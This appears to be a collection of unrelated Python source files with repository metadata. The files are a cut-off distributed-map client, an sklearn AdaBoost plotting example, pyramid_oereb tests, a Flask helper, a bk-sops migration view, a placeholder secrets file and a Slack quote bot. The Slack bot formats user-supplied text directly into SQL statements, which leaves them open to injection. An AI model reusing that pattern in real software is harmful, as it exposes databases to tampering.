RemoveIfSame(self, key, value, threadId): msg=mapcodec.MapRemoveIfSameCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemoveIfSameCodec.decodeResponse(msg2).response def RemoveInterceptor(self, id): msg=mapcodec.MapRemoveInterceptorCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(id)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemoveInterceptorCodec.decodeResponse(msg2).response def RemovePartitionLostListener(self, registrationId): msg=mapcodec.MapRemovePartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapRemovePartitionLostListenerCodec.decodeResponse(msg2).response def Replace(self, key, value, threadId): msg=mapcodec.MapReplaceCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapReplaceCodec.decodeResponse(msg2).response def ReplaceIfSame(self, key, testValue, value, threadId): msg=mapcodec.MapReplaceIfSameCodec.encodeRequest( encode.encodestring(self.title), key, testValue, value, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapReplaceIfSameCodec.decodeResponse(msg2).response def Set(self, key, value, threadId, ttl): msg=mapcodec.MapSetCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapSetCodec.decodeResponse(msg2) def Size(self, ): msg=mapcodec.MapSizeCodec.encodeRequest( encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapSizeCodec.decodeResponse(msg2).response def SubmitToKey(self, entryProcessor, key): msg=mapcodec.MapSubmitToKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapSubmitToKeyCodec.decodeResponse(msg2).response def TryLock(self, key, threadId, lease, timeout): msg=mapcodec.MapTryLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(lease), encode.encodeint64(timeout)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapTryLockCodec.decodeResponse(msg2).response def TryPut(self, key, value, threadId, timeout): msg=mapcodec.MapTryPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(timeout)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapTryPutCodec.decodeResponse(msg2).response def TryRemove(self, key, threadId, timeout): msg=mapcodec.MapTryRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(timeout)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapTryRemoveCodec.decodeResponse(msg2).response def Unlock(self, key, threadId): msg=mapcodec.MapUnlockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapUnlockCodec.decodeResponse(msg2) def Values(self): msg=mapcodec.MapValuesCodec.encodeRequest(encode.encodestring(self.title)) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapValuesCodec.decodeResponse(msg2).list def ValuesWithPagingPredicate(self, predicate): msg=mapcodec.MapValuesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapValuesWithPagingPredicateCodec.decodeResponse(msg2).entrySet def ValuesWithPredicate(self, predicate): msg=mapcodec.MapValuesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate) retryable=msg.retryable self.connection.adjustCorrelationId(msg) correlationid=msg.correlation self.connection.sendPackage(msg.encodeMessage()) response=self.connection.getPackageWithCorrelationId(correlationid,retryable) msg2=ClientMessage.decodeMessage(response) return mapcodec.MapValuesWithPredicateCodec.decodeResponse(msg2).list
61.28051
175
0.76099
39e7cdcb8ef4d17fcaeaefc7bf1131478de86552
4,124
py
Python
scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py
RTHMaK/git-squash-master
76c4c8437dd18114968e69a698f4581927fcdabf
[ "BSD-2-Clause" ]
1
2021-11-26T12:22:13.000Z
2021-11-26T12:22:13.000Z
scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py
RTHMaK/git-squash-master
76c4c8437dd18114968e69a698f4581927fcdabf
[ "BSD-2-Clause" ]
null
null
null
scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py
RTHMaK/git-squash-master
76c4c8437dd18114968e69a698f4581927fcdabf
[ "BSD-2-Clause" ]
null
null
null
""" ===================================== Multi-class AdaBoosted Decision Trees ===================================== This example reproduces Figure 1 of Zhu et al [1] and shows how boosting can improve prediction accuracy on a multi-class problem. The classification dataset is constructed by taking a ten-dimensional standard normal distribution and defining three classes separated by nested concentric ten-dimensional spheres such that roughly equal numbers of samples are in each class (quantiles of the :math:`\chi^2` distribution). The performance of the SAMME and SAMME.R [1] algorithms are compared. SAMME.R uses the probability estimates to update the additive model, while SAMME uses the classifications only. As the example illustrates, the SAMME.R algorithm typically converges faster than SAMME, achieving a lower test error with fewer boosting iterations. The error of each algorithm on the test set after each boosting iteration is shown on the left, the classification error on the test set of each tree is shown in the middle, and the boost weight of each tree is shown on the right. All trees have a weight of one in the SAMME.R algorithm and therefore are not shown. .. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009. """ print(__doc__) # Author: Noel Dawe <noel.dawe@gmail.com> # # License: BSD 3 clause from sklearn.externals.six.moves import zip import matplotlib.pyplot as plt from sklearn.datasets import make_gaussian_quantiles from sklearn.ensemble import AdaBoostClassifier from sklearn.metrics import accuracy_score from sklearn.tree import DecisionTreeClassifier X, y = make_gaussian_quantiles(n_samples=13000, n_features=10, n_classes=3, random_state=1) n_split = 3000 X_train, X_test = X[:n_split], X[n_split:] y_train, y_test = y[:n_split], y[n_split:] bdt_real = AdaBoostClassifier( DecisionTreeClassifier(max_depth=2), n_estimators=600, learning_rate=1) bdt_discrete = AdaBoostClassifier( DecisionTreeClassifier(max_depth=2), n_estimators=600, learning_rate=1.5, algorithm="SAMME") bdt_real.fit(X_train, y_train) bdt_discrete.fit(X_train, y_train) real_test_errors = [] discrete_test_errors = [] for real_test_predict, discrete_train_predict in zip( bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)): real_test_errors.append( 1. - accuracy_score(real_test_predict, y_test)) discrete_test_errors.append( 1. - accuracy_score(discrete_train_predict, y_test)) n_trees_discrete = len(bdt_discrete) n_trees_real = len(bdt_real) # Boosting might terminate early, but the following arrays are always # n_estimators long. We crop them to the actual number of trees here: discrete_estimator_errors = bdt_discrete.estimator_errors_[:n_trees_discrete] real_estimator_errors = bdt_real.estimator_errors_[:n_trees_real] discrete_estimator_weights = bdt_discrete.estimator_weights_[:n_trees_discrete] plt.figure(figsize=(15, 5)) plt.subplot(131) plt.plot(range(1, n_trees_discrete + 1), discrete_test_errors, c='black', label='SAMME') plt.plot(range(1, n_trees_real + 1), real_test_errors, c='black', linestyle='dashed', label='SAMME.R') plt.legend() plt.ylim(0.18, 0.62) plt.ylabel('Test Error') plt.xlabel('Number of Trees') plt.subplot(132) plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_errors, "b", label='SAMME', alpha=.5) plt.plot(range(1, n_trees_real + 1), real_estimator_errors, "r", label='SAMME.R', alpha=.5) plt.legend() plt.ylabel('Error') plt.xlabel('Number of Trees') plt.ylim((.2, max(real_estimator_errors.max(), discrete_estimator_errors.max()) * 1.2)) plt.xlim((-20, len(bdt_discrete) + 20)) plt.subplot(133) plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_weights, "b", label='SAMME') plt.legend() plt.ylabel('Weight') plt.xlabel('Number of Trees') plt.ylim((0, discrete_estimator_weights.max() * 1.2)) plt.xlim((-20, n_trees_discrete + 20)) # prevent overlapping y-axis labels plt.subplots_adjust(wspace=0.25) plt.show()
34.082645
79
0.738118
ccfa8ea3f336b03b3ce0ce5baafc754ab34b5ff8
8,302
py
Python
tests/webservice/test_getegrid.py
danduk82/pyramid_oereb
4544ef81371aabd2a2f0759c2073f2ca51f85ff7
[ "BSD-2-Clause" ]
null
null
null
tests/webservice/test_getegrid.py
danduk82/pyramid_oereb
4544ef81371aabd2a2f0759c2073f2ca51f85ff7
[ "BSD-2-Clause" ]
2
2019-11-22T16:32:47.000Z
2019-12-03T07:31:02.000Z
tests/webservice/test_getegrid.py
danduk82/pyramid_oereb
4544ef81371aabd2a2f0759c2073f2ca51f85ff7
[ "BSD-2-Clause" ]
null
null
null
# -*- coding: utf-8 -*- import json import math from jsonschema import Draft4Validator from shapely.geometry import Point, Polygon, MultiPolygon import pytest from pyramid.httpexceptions import HTTPBadRequest, HTTPNoContent from pyramid_oereb.lib.records.real_estate import RealEstateRecord from pyramid_oereb.lib.records.view_service import ViewServiceRecord from tests import schema_json_extract, pyramid_oereb_test_config from tests.mockrequest import MockRequest from pyramid_oereb.views.webservice import PlrWebservice def test_getegrid_coord_missing_parameter(): webservice = PlrWebservice(MockRequest()) with pytest.raises(HTTPBadRequest): webservice.get_egrid_coord() def test_getegrid_ident(): with pyramid_oereb_test_config(): request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/BLTEST/1000') # Add params to matchdict as the view will do it for /getegrid/{format}/{identdn}/{number} request.matchdict.update({ 'format': u'json', 'identdn': u'BLTEST', 'number': u'1000' }) webservice = PlrWebservice(request) response = webservice.get_egrid_ident().json with open(schema_json_extract) as f: schema = json.loads(f.read()) Draft4Validator.check_schema(schema) validator = Draft4Validator(schema) validator.validate(response) assert isinstance(response, dict) real_estates = response.get('GetEGRIDResponse') assert isinstance(real_estates, list) assert len(real_estates) == 1 assert real_estates[0]['egrid'] == u'TEST' assert real_estates[0]['number'] == u'1000' assert real_estates[0]['identDN'] == u'BLTEST' def test_getegrid_xy(): with pyramid_oereb_test_config(): url = 'http://example.com/oereb/getegrid/json/?XY=-1999999.032739449,-999998.940457533' request = MockRequest( current_route_url=url ) # Add params to matchdict as the view will do it for /getegrid/{format}/ request.matchdict.update({ 'format': u'json' }) request.params.update({ 'XY': '-1999999.032739449,-999998.940457533' }) webservice = PlrWebservice(request) response = webservice.get_egrid_coord().json with open(schema_json_extract) as f: schema = json.loads(f.read()) Draft4Validator.check_schema(schema) validator = Draft4Validator(schema) validator.validate(response) assert isinstance(response, dict) real_estates = response.get('GetEGRIDResponse') assert isinstance(real_estates, list) assert len(real_estates) == 2 assert real_estates[0]['egrid'] == u'TEST' assert real_estates[0]['number'] == u'1000' assert real_estates[0]['identDN'] == u'BLTEST' def test_getegrid_gnss(): with pyramid_oereb_test_config(): request = MockRequest( current_route_url='http://example.com/oereb/getegrid/json/?GNSS=-19.917989937473,32.1244978460310' ) # Add params to matchdict as the view will do it for /getegrid/{format}/ request.matchdict.update({ 'format': u'json' }) request.params.update({ 'GNSS': '32.1244978460310,-19.917989937473' }) webservice = PlrWebservice(request) response = webservice.get_egrid_coord().json with open(schema_json_extract) as f: schema = json.loads(f.read()) Draft4Validator.check_schema(schema) validator = Draft4Validator(schema) validator.validate(response) assert isinstance(response, dict) real_estates = response.get('GetEGRIDResponse') assert isinstance(real_estates, list) assert len(real_estates) == 1 assert real_estates[0]['egrid'] == u'TEST' assert real_estates[0]['number'] == u'1000' assert real_estates[0]['identDN'] == u'BLTEST' def test_getegrid_ident_missing_parameter(): webservice = PlrWebservice(MockRequest()) with pytest.raises(HTTPBadRequest): webservice.get_egrid_ident() def test_getegrid_address(): with pyramid_oereb_test_config(): request = MockRequest( current_route_url='http://example.com/oereb/getegrid/json/4410/test/10' ) # Add params to matchdict as the view will do it for # /getegrid/{format}/{postalcode}/{localisation}/{number} request.matchdict.update({ 'format': u'json', 'postalcode': u'4410', 'localisation': u'test', 'number': u'10' }) webservice = PlrWebservice(request) response = webservice.get_egrid_address().json with open(schema_json_extract) as f: schema = json.loads(f.read()) Draft4Validator.check_schema(schema) validator = Draft4Validator(schema) validator.validate(response) assert isinstance(response, dict) assert response.get('GetEGRIDResponse') is not None assert response.get('GetEGRIDResponse')[0].get('egrid') == u'TEST' assert response.get('GetEGRIDResponse')[0].get('number') == u'1000' assert response.get('GetEGRIDResponse')[0].get('identDN') == u'BLTEST' def test_getegrid_address_missing_parameter(): webservice = PlrWebservice(MockRequest()) with pytest.raises(HTTPBadRequest): webservice.get_egrid_address() def test_get_egrid_response(): with pyramid_oereb_test_config(): request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/') # Add params to matchdict as the view will do it for /getegrid/{format}/ request.matchdict.update({ 'format': u'json' }) view_service = ViewServiceRecord('test', 1, 1.0, {'de': 'test'}, None) record = RealEstateRecord('test', 'BL', 'test', 1, 100, MultiPolygon([Polygon([(0, 0), (1, 1), (1, 0)])]), view_service, number='number', identdn='identdn', egrid='egrid') response = PlrWebservice(request).__get_egrid_response__([record]).json assert response == { 'GetEGRIDResponse': [{ 'egrid': 'egrid', 'number': 'number', 'identDN': 'identdn' }] } def test_get_egrid_response_no_content(): with pyramid_oereb_test_config(): request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/') # Add params to matchdict as the view will do it for /getegrid/{format}/ request.matchdict.update({ 'format': u'json' }) response = PlrWebservice(request).__get_egrid_response__([]) assert isinstance(response, HTTPNoContent) @pytest.mark.parametrize('src,dst,buffer_dist', [ ('2621857.856,1259856.578', (2621857.856, 1259856.578), None), ('621857.759,259856.554', (2621857.799, 1259856.500), 1.0) ]) def test_parse_xy(src, dst, buffer_dist): geom = PlrWebservice(MockRequest()).__parse_xy__(src, buffer_dist=buffer_dist) if buffer_dist: assert isinstance(geom, Polygon) assert round(geom.area, 2) == round(math.pi, 2) assert round(geom.centroid.x, 3) == round(dst[0], 3) assert round(geom.centroid.y, 3) == round(dst[1], 3) else: assert isinstance(geom, Point) assert round(geom.x, 3) == round(dst[0], 3) assert round(geom.y, 3) == round(dst[1], 3) def test_parse_gnss(): geom = PlrWebservice(MockRequest()).__parse_gnss__('47.48911,7.72866') assert isinstance(geom, Polygon) assert round(geom.centroid.x, 3) == 2621858.036 assert round(geom.centroid.y, 3) == 1259856.747 assert round(geom.area, 2) == round(math.pi, 2) def test_parse_invalid_coordinates(): with pytest.raises(HTTPBadRequest): PlrWebservice(MockRequest()).__parse_gnss__('7.72866') with pytest.raises(HTTPBadRequest): PlrWebservice(MockRequest()).__parse_xy__('2621857.856;1259856.578')
37.396396
110
0.635148
f391e26b8fa3d1f4d4487fcea813274a176fffce
354
py
Python
backend/src/util/response_generator.py
leowucn/lazykindler
45717e08aa0ccc504a9a5e3883dc403470ae824b
[ "MIT" ]
2
2021-12-22T15:00:15.000Z
2022-03-21T10:38:30.000Z
backend/src/util/response_generator.py
leowucn/lazykindler
45717e08aa0ccc504a9a5e3883dc403470ae824b
[ "MIT" ]
null
null
null
backend/src/util/response_generator.py
leowucn/lazykindler
45717e08aa0ccc504a9a5e3883dc403470ae824b
[ "MIT" ]
null
null
null
from flask import Response, json from datetime import datetime, date def response_generator(payload, status): return Response(response=json.dumps({"payload": payload}), status=status, mimetype='application/json') # json serializer def json_serial(obj): if isinstance(obj, (datetime, date)): return obj.isoformat() return str(obj)
25.285714
106
0.731638
e310138c0f4ce00425baa11c92f96726e1ab9cbb
3,328
py
Python
gcloud/contrib/admin/migration_api/template_category.py
wkma/bk-sops
8fb5609c0c4495c28d588fbafa9d9f5f2976929b
[ "Apache-2.0" ]
2
2021-07-28T01:48:31.000Z
2021-11-17T11:02:26.000Z
gcloud/contrib/admin/migration_api/template_category.py
wkma/bk-sops
8fb5609c0c4495c28d588fbafa9d9f5f2976929b
[ "Apache-2.0" ]
null
null
null
gcloud/contrib/admin/migration_api/template_category.py
wkma/bk-sops
8fb5609c0c4495c28d588fbafa9d9f5f2976929b
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import json import traceback from django.http.response import JsonResponse from django.views.decorators.csrf import csrf_exempt from django.views.decorators.http import require_POST from blueapps.account.decorators import login_exempt from gcloud.contrib.admin.migration_api.decorators import require_migrate_token from gcloud.core.constant import TASK_CATEGORY from gcloud import err_code from gcloud.label.models import Label, TemplateLabelRelation from gcloud.tasktmpl3.models import TaskTemplate @login_exempt @csrf_exempt @require_POST @require_migrate_token def migrate_template_category(request): try: params = json.loads(request.body) except Exception as e: return JsonResponse( { "result": False, "message": "request body is not a valid json: {}".format(str(e)), "code": err_code.REQUEST_PARAM_INVALID.code, } ) project_id = params.get("project_id") creator = params.get("creator", "admin") MIGRATE_LABEL_COLOR = "#b3eafa" category_mappings = {} existing_labels = Label.objects.filter(project_id=project_id).values("id", "name") label_info = {label["name"]: label["id"] for label in existing_labels} for category_code, category_name in TASK_CATEGORY: if category_name in label_info: category_mappings[category_code] = label_info[category_name] elif category_code != "Default": label = Label( name=category_name, description=category_code, is_default=False, creator=creator, color=MIGRATE_LABEL_COLOR, project_id=project_id, ) label.save() category_mappings[category_code] = label.id task_templates = TaskTemplate.objects.filter(project__id=project_id, is_deleted=False).values("id", "category") label_relationships = [ TemplateLabelRelation(template_id=template["id"], label_id=category_mappings[template["category"]]) for template in task_templates if template["category"] in category_mappings ] try: TemplateLabelRelation.objects.bulk_create(label_relationships, ignore_conflicts=True) except Exception as e: return JsonResponse( { "result": False, "error": "migrate template category to labels error: {} \n {}".format(e, traceback.format_exc()), } ) return JsonResponse({"result": True, "data": "migrate template category to labels success"})
39.619048
115
0.696514
6f53187945bf2acdd63789a349a6bdf3fd9d3e41
1,215
py
Python
secrets.py
GregEigsti/HiveOS-Monitor
7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c
[ "MIT" ]
null
null
null
secrets.py
GregEigsti/HiveOS-Monitor
7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c
[ "MIT" ]
null
null
null
secrets.py
GregEigsti/HiveOS-Monitor
7d26f10bbc4c8ae26d0e2925ebce3fddc6e11b1c
[ "MIT" ]
null
null
null
#!/usr/bin/env python """ HiveOS-Monitor HiveOS and currency monitoring script with temperature monitoring and heat management. Project files: hiveos.py - main script and stdout output code temperature.py - temperature monitor / SSH based OC control. Interacts with Adafruit IO for UI goodness webhelpers.py - web data fetch and parsing methods secrets.py - account login credentials Greg Eigsti greg@eigsti.com """ ######################################################################################################################## ## keys and secrets ######################################################################################################################## # Hive account HIVE_USER = 'replace' HIVE_PASS = 'replace' # Adafruit IO ADAFRUIT_IO_KEY = 'replace' # Miner SSH account for OC updates MINER_USER = 'replace' MINER_PASS = 'replace' MINER_IPADDR = '192.168.0.10' ##################################################################################### ## main script entry point ##################################################################################### if __name__ == '__main__': print('Intended to be exeuted as a HiveOS-Monitor library')
31.153846
120
0.483951
222dd53901bfb2ab9baf636ea45e6459defef6a1
9,975
py
Python
runOtakuBot.py
Eagleheardt/otakuBot
6f8576423bb1b0701d5a60095bed7552b2711bab
[ "Unlicense" ]
null
null
null
runOtakuBot.py
Eagleheardt/otakuBot
6f8576423bb1b0701d5a60095bed7552b2711bab
[ "Unlicense" ]
null
null
null
runOtakuBot.py
Eagleheardt/otakuBot
6f8576423bb1b0701d5a60095bed7552b2711bab
[ "Unlicense" ]
null
null
null
import sqlite3 from sqlite3 import Error import os import time import datetime import re import random import schedule import cryptography from apscheduler.schedulers.background import BackgroundScheduler from slackclient import SlackClient from cryptography.fernet import Fernet conn = sqlite3.connect('/home/ubuntu/otakuBot/data/anime.db') serverCursor = conn.cursor() keyFile = open('/home/ubuntu/otakuBot/data/otakubot_token.key', 'rb') key = keyFile.read() keyFile.close() f = Fernet(key) encryptedTokenFile = open('/home/ubuntu/otakuBot/data/otakubot_token.encrypted', 'rb') encryptedToken = encryptedTokenFile.read() decryptedToken = f.decrypt(encryptedToken) SLACK_BOT_TOKEN = decryptedToken.decode() # instantiate Slack client slack_client = SlackClient(SLACK_BOT_TOKEN) # starterbot's user ID in Slack: value is assigned after the bot starts up otakuBotID = None # constants RTM_READ_DELAY = 0.5 # 0.5 second delay in reading events def stdOut(s): curDate = datetime.datetime.today().strftime('%Y-%m-%d') curTime = datetime.datetime.now().strftime('%H:%M:%S') logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a") logFile.write(("{0}: {1}\n").format(curTime,s)) logFile.close() return def logIt(): curDate = datetime.datetime.today().strftime('%Y-%m-%d') curTime = datetime.datetime.now().strftime('%H:%M:%S') logFile = open((("/home/ubuntu/logs/{0}.log").format(curDate)),"a") logFile.write(("{0}: Otaku 15 minute check in!\n").format(curTime)) logFile.close() return schedule.every(15).minutes.do(logIt) def SQLReturn(aConn,sqlCmd): reportCur = aConn.cursor() reportCur.execute(sqlCmd) SQLResults = reportCur.fetchall() reportCur.close() return SQLResults def insertQuote (aUser,theQuote): newCur = conn.cursor() newCur.execute((""" INSERT INTO Quotes (User, Words) VALUES ('{0}','{1}'); """).format(aUser,theQuote)) newCur.close() conn.commit() return def insertAniMusic (aUser,theLink): newCur = conn.cursor() newCur.execute((""" INSERT INTO Music (Category, User, Link) VALUES ('Anime','{0}','{1}'); """).format(aUser,theLink)) newCur.close() conn.commit() return def insertEngMusic (aUser,theLink): newCur = conn.cursor() newCur.execute((""" INSERT INTO Music (Category, User, Link) VALUES ('English','{0}','{1}'); """).format(aUser,theLink)) newCur.close() conn.commit() return def insertIcon (aUser,theLink): newCur = conn.cursor() newCur.execute((""" INSERT INTO Music (Category, User, Link) VALUES ('Iconic','{0}','{1}'); """).format(aUser,theLink)) newCur.close() conn.commit() return def deleteQuote (quoteID): newCur = conn.cursor() newCur.execute((""" DELETE FROM Quotes WHERE ID == {0}; """).format(quoteID)) newCur.close() conn.commit() return def getQuote(aConn): sqlCmd = "SELECT Words FROM Quotes;" results = SQLReturn(aConn,sqlCmd) allQuotes = [] for quote in results: allQuotes.append(quote) return (random.choice(allQuotes)) def getAniMusic(aConn): sqlCmd = "SELECT Link FROM Music WHERE Category = 'Anime';" results = SQLReturn(aConn,sqlCmd) allQuotes = [] for quote in results: allQuotes.append(quote) return (random.choice(allQuotes)) def getEngMusic(aConn): sqlCmd = "SELECT Link FROM Music WHERE Category = 'English';" results = SQLReturn(aConn,sqlCmd) allQuotes = [] for quote in results: allQuotes.append(quote) return (random.choice(allQuotes)) def getIconic(aConn): sqlCmd = "SELECT Link FROM Music WHERE Category = 'Iconic';" results = SQLReturn(aConn,sqlCmd) allQuotes = [] for quote in results: allQuotes.append(quote) return (random.choice(allQuotes)) def getAllQuotes(aConn): sqlCmd = "SELECT ID, Words FROM Quotes;" results = SQLReturn(aConn,sqlCmd) allQuotes = [] for quote in results: allQuotes.append(quote) newStr = "All the Quotes\n" for item in allQuotes: i = 1 for place in item: if i == 1: newStr += "ID: " + str(place) + "\n" if i == 2: newStr += "Words: " + str(place) + "\n\n" i += 1 return newStr def EODReportRange (date1, date2): # Gets a range summary of the VM number and status reported cmd = ((""" SELECT ServerNumber as [Server] , ServerStatus as [Status] , count(ServerStatus) as [Amount] FROM Status WHERE date(TimeStamp) BETWEEN '{0}' AND '{1}' AND ServerNumber IN('1','2','3','4','17') GROUP BY ServerNumber ,ServerStatus """).format(date1, date2)) results = SQLReturn(conn,cmd) newStr = "Report for: " + date1 + " to " + date2 + "\n" for row in results: i = 1 for item in row: if i == 1: newStr += "VM" + str(item) + " - " if i == 2: newStr += "Status: " + str(item) + " - " if i == 3: if item != 1: newStr += "Reported: " + str(item) + " times" else: newStr += "Reported: " + str(item) + " time" i += 1 newStr += "\n" return newStr def parseSlackInput(aText): if aText and len(aText) > 0: item = aText[0] if 'text' in item: msg = item['text'].strip(' ') chn = item['channel'] usr = item['user'] stp = item['ts'] return [str(msg),str(chn),str(usr),str(stp)] else: return [None,None,None,None] def inChannelResponse(channel,response): slack_client.api_call( "chat.postMessage", channel=channel, text=response, as_user=True ) return def threadedResponse(channel,response,stamp): slack_client.api_call( "chat.postMessage", channel=channel, text=response, thread_ts=stamp, as_user=True ) return def directResponse(someUser,text): slack_client.api_call( "chat.postMessage", channel=someUser, text=text, as_user=True ) return def parseQuote(someMsg): starter,theQuote = someMsg.split(' ', 1) return theQuote def handle_command(command, channel, aUser, tStamp): """ Executes bot command if the command is known """ #command = command.lower() response = None # This is where you start to implement more commands! if command.lower().startswith("!help"): response = """I'm Otaku Bot! I don't do a lot yet. But watch out! I'm just getting started! !addquote[SPACE][A quote of your choice!] - I will remember your quote! !quote - I will reply with a random quote! !addAniMusic[SPACE][Link to a Japanese anime song] - I will remember your music! !addEngMusic[SPACE][Link to an English anime song] - I will remember your music! !addIconic[SPACE][Link to an iconic anime moment] - I will remember your moment! !animusic - I will reply with a Japanese anime song from memory! !engmusic - I will reply with an English anime song from memory! !iconic - I will show you an iconic anime moment! """ inChannelResponse(channel,response) return if command.lower().startswith("!addquote"): newQuote = str(command[10:]) insertQuote(aUser,newQuote) threadedResponse(channel,"I'll try to remember: " + newQuote ,tStamp) stdOut("Quote Added: " + newQuote) return if command.lower().startswith("!quote"): aQuote = getQuote(conn) inChannelResponse(channel,aQuote) return if command.lower().startswith("!animusic"): aQuote = getAniMusic(conn) inChannelResponse(channel,aQuote) return if command.lower().startswith("!engmusic"): aQuote = getEngMusic(conn) inChannelResponse(channel,aQuote) return if command.lower().startswith("!iconic"): aQuote = getIconic(conn) inChannelResponse(channel,aQuote) return if command.lower().startswith("!onepunch"): inChannelResponse(channel,"https://www.youtube.com/watch?v=_TUTJ0klnKk") return if command.lower().startswith("!addanimusic"): newQuote = str(command[13:]) insertAniMusic(aUser,newQuote) threadedResponse(channel,"I'll add this to the Anime music section: " + newQuote ,tStamp) stdOut("Anime Music Added: " + newQuote) return if command.lower().startswith("!addengmusic"): newQuote = str(command[13:]) insertEngMusic(aUser,newQuote) threadedResponse(channel,"I'll add this to the English music section: " + newQuote ,tStamp) stdOut("English Music Added: " + newQuote) return if command.lower().startswith("!addiconic"): newQuote = str(command[11:]) insertIcon(aUser,newQuote) threadedResponse(channel,"I'll add this to the Iconic moments section: " + newQuote ,tStamp) stdOut("Iconic Moment Added: " + newQuote) return if command.lower().startswith("!delquote"): if aUser == "UC176R92M": num = command[10:] deleteQuote(num) inChannelResponse(channel,"You have removed a quote.") else: inChannelResponse(channel,"You don't have permission to do that!") return if command.lower().startswith("!getquotes"): if aUser == "UC176R92M": inChannelResponse(channel,getAllQuotes(conn)) else: inChannelResponse(channel,"You don't have permission to do that!") return if command.startswith("!test"): return response = (("""Text:{0} Channel:{1} TS:{2} User:{3} """).format(command,channel,tStamp,aUser)) inChannelResponse(channel,response) return return # Sends the response back to the channel if __name__ == "__main__": if slack_client.rtm_connect(with_team_state=False): stdOut("Otaku Bot connected and running!") # 